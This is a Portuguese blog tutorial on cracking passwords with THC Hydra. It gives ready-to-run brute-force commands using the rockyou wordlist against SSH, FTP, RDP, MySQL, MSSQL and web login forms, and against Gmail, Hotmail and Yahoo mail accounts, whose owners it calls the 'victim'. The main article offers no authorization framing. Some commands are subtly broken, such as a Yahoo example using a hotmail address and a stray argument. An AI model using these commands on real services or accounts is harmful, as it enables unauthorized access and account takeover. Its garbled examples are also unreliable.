Pular para o conteúdo principal

Seguidores

Quebrar senha com hydra

THC Hydra é uma ferramenta utilizada para quebras de senhas com a versão unica e gratuita. É considerada entre uma das melhores ferramentas de quebras de senhas para comunicação em redes.

Objetivo deste artigo é mostrar o funcionamento técnico desta ferramenta, quais comandos devem ser digitados para realizarem um brute force atacck. Pois dependendo do sistema a qual deseja descobrir a senha, as técnicas são totalmente diferentes. A seguir vamos citar e exemplificar os tipos de ataque realizado em cada sistemas.

Também é importante ressaltar que, esta ferramenta é bem compreensível e ágil quando falamos em ataque a força bruta para descobertas de senhas.

Hydra Brute force Attack

Ataque de Força Bruta
Ataque de Força Bruta

Brute Force Attack é conhecido pelo nome de ataque a força bruta, ou seja o ataque será realizado com base em Wordlist que contém as principais palavras chaves a qual o atacante ache que a vitima utiliza para logar em determinado sistema. É considerado um tipo de ataque estratégico, onde além exigir o conhecimento técnico da ferramenta Hydra, também criatividades e inteligência no objetivo. Quando falamos em Worlist, significa que terá que adivinhar as principais palavras chaves que vitima pode usar para logar e colocá-las em um arquivo de textos. Após as inserções estarão pronto para realizarem o ataque.

Se pesquisarem na internet pelo no nome "Wordlist" aparecerá vários dicionários de palavras. Costumo baixar algumas da internet e editá-las incrementando mais algumas palavras chaves.

Por padrão os sistemas operacionais com distribuições voltado para segurança da informação, Vem com a ferramenta THC Hydra instalada. Abaixo vou citar as principais distribuição mais usadas por profissionais no mercado de trabalho.

  • Kali linux.
  • Parrot Security OS.
  • BlackArch.
  • Back Box
  • Cyborg Hawk.
  • HStrike.
  • Pentoo.
  • Fedora Spin.
  • NodeZero.
Atualmente realizo meu Pen test no Kali Linux. Inclusive para esta atividade relacionado a quebras de senhas com Hydra, está sendo usado está distribuição.

Para este execícios vamos usar o Wordlist "Rockyou.txt", onde já vem criado kali linux por padrão. O caminho do diretório do arquivo é "/usr/share/wordlists/rockyou.txt".

Antes de começar o Brute Force Attack, edite o arquivo conforme falado anteriormente.

No kali, digite o seguinte comando para inclusão de palavras chaves no arquivo "rockyou.txt", após a inclusão, bora para o Brute Force Attack:
root@Kali2018-4:~# nano /usr/share/wordlists/rockyou.txt

Hydra ssh brute force example

SSH é conhecido pelo nome de Secure Shell, é um protocolo de rede criptográfico para operação de serviços de rede de forma segura sobre uma rede insegura. o login remoto de usuários a sistemas de computadores é um dos melhores exemplos a ser aplicado sobre a funcionalidade do SSH.
root@Kali2018-4:~# hydra -l <User_Name> -P /usr/share/wordlists/rockyou.txt <Ip_Maquina> ssh

Hydra ftp brute force command

FTP é conhecido pelo nome de Protocolo de Transferência de Arquivos é um protocolo padrão independente de hardware sobre um modo de transferir arquivos é um programa de transferência. A transferência de dados em redes de computadores envolve normalmente transferência de arquivos e acesso a sistemas de arquivos remotos.
root@Kali2018-4:~# hydra -l <User_Name> -P /usr/share/wordlists/rockyou.txt <Ip_Maquina> ftp

Hydra rdp example

RDP conhecido pelo nome Remote Desktop Protocol, é um protocolo multi-canal que permite que um usuário se conecte a um computador rodando o Microsoft Terminal Services. Existem clientes para a maioria das versões do Windows, e outros sistemas operacionais como o Linux. O servidor escuta por padrão a porta TCP 3389.
root@Kali2018-4:~# hydra -l <User_Name> -P /usr/share/wordlists/rockyou.txt <Ip_Maquina> rdp

Hydra mysql bruteforce

O MySQL é um sistema de gerenciamento de banco de dados, que utiliza a linguagem SQL como interface. É atualmente um dos sistemas de gerenciamento de bancos de dados mais populares da Oracle Corporation.
root@Kali2018-4:~# hydra -l <User_Name> -P /usr/share/wordlists/rockyou.txt <Ip_Maquina> mysql

Hydra brute force sql server

Microsoft SQL Server é um sistema gerenciador de Banco de dados relacional desenvolvido pela Sybase em parceria com a Microsoft. Esta parceria durou até 1994, com o lançamento da versão para Windows NT e desde então a Microsoft mantém a manutenção do produto.
root@Kali2018-4:~# hydra -l <User_Name> -P /usr/share/wordlists/rockyou.txt <Ip_Maquina> mssql

Hydra gmail brute force

O Gmail é um serviço gratuito de webmail criado pela Google em 2004. Por padrão, o Gmail está configurado para usar o HTTPS, um protocolo seguro que fornece comunicações autenticadas e criptografadas. Atualmente novos cadastros estão abertos ao público e podem ser feitos diretamente no site.
root@Kali2018-4:~# hydra -l <User_name@gmail.com> -P /usr/share/wordlists/rockyou.txt -s 465 -S -v -V -t 4 smtp.gmail.com smtp

Brute Force HTTP em forms com Hydra

A duas maneiras muito importante para trabalhar na configuração deste attack.
  • Configurar o proxy do navegar para enviar requisição ao burpsuit, onde será possivel capturas as informações para a configuração do atacck no Hydra.
  • Ou caso prefere, ir ao código fonte da pagina para capturar as informações.

root@Kali2018-4:~# hydra -l <User_Name> -P /usr/share/wordlists/rockyou.txt testphp.vulnweb.com http-post-form "/userinfo.php:uname=^USER^&pass=^PASS^&Login=Login:Login Failed"

Hydra brute force email

Um correio eletrônico ou correio eletrónico ou, ainda, e-mail, é um método que permite compor, enviar e receber mensagens através de sistemas eletrônicos de comunicação. O Correio Eletrônico é tipicamente um modo assíncrono de comunicação.
root@Kali2018-4:~# hydra -l <User_Name@hotmail.com> -P /usr/share/wordlists/rockyou.txt -s 587 -S -v -V -t 1 s smtp.live.com

Hydra brute force yahoo

O Yahoo! Mail é um webmail do Yahoo! gratuito com espaço ilimitado e está disponível em vários idiomas. Não há necessidade de convite para a criação de uma conta. Alguns dos serviços oferecidos são: porta arquivos e fotos. É um dos serviços de webmail mais eficiente e simples.
root@Kali2018-4:~# hydra -l <User_Name@hotmail.com> -P /usr/share/wordlists/rockyou.txt -s 587 -S -v -V -t 1 s smtp.mail.yahoo.com



Postagens mais visitadas deste blog

google hacking comandos

O mecanismo de pesquisa do Google encontrado em www.google.com oferece muitos recursos diferentes incluindo tradução de idiomas e documentos, web, imagem, grupos de notícias, catálogo e pesquisas de notícias e muito mais. Esses recursos oferecem benefícios óbvios, mesmo para os mais internauta não iniciada, mas esses mesmos recursos permitem possibilidades muito mais nefastas  para os usuários mais maliciosos da Internet, incluindo hackers, criminosos de computador, identidade ladrões e até terroristas.  Este artigo descreve as aplicações mais nefastas do Mecanismo de pesquisa do Google, técnicas que foram coletivamente denominadas "hackers do Google ou Google Docker". Os códigos demonstrado logo abaixo tem o objetivo de mostrar tecnicas que são ultizados pelo google hacking para exploração de vulnerabilidades em determinado sistema. Qualquer técnica demonstrado aqui e que for usado contra sistema cuja não tem autorização para realizar este tipo de testes, é c

Zoom corrige vulnerabilidade PARA WINDOWS

Zoom corrige vulnerabilidade O Zoom anunciou ter corrigido uma nova falha de segurança que poderia permitir aos cibercriminosos criar links falsos de reuniões online, direcionando as vítimas para golpes de phishing. A vulnerabilidade permitia aos usuários corporativos gerar links personalizados para reuniões, como por exemplo “suaempresa.zoom.us”, e utilizá-los para convidar os participantes. Ela poderia ser explorada de duas maneiras, de acordo com a equipe de especialistas Em um dos cenários, os hackers tinham a possibilidade de alterar a URL personalizada, incluindo um link direto para uma conferência virtual falsa, sem que os convidados notassem a diferença. O outro envolvia o uso da interface web personalizada do Zoom, inserindo nela um link malicioso. ZOOM lança patch de correção Windows No dia 10 de julho de 2020 a EMPRESA Zoom lança uma nova versão para correção de vulnerabilidade para sistema operacional Windows Lançamento atual Data do lançamento: 10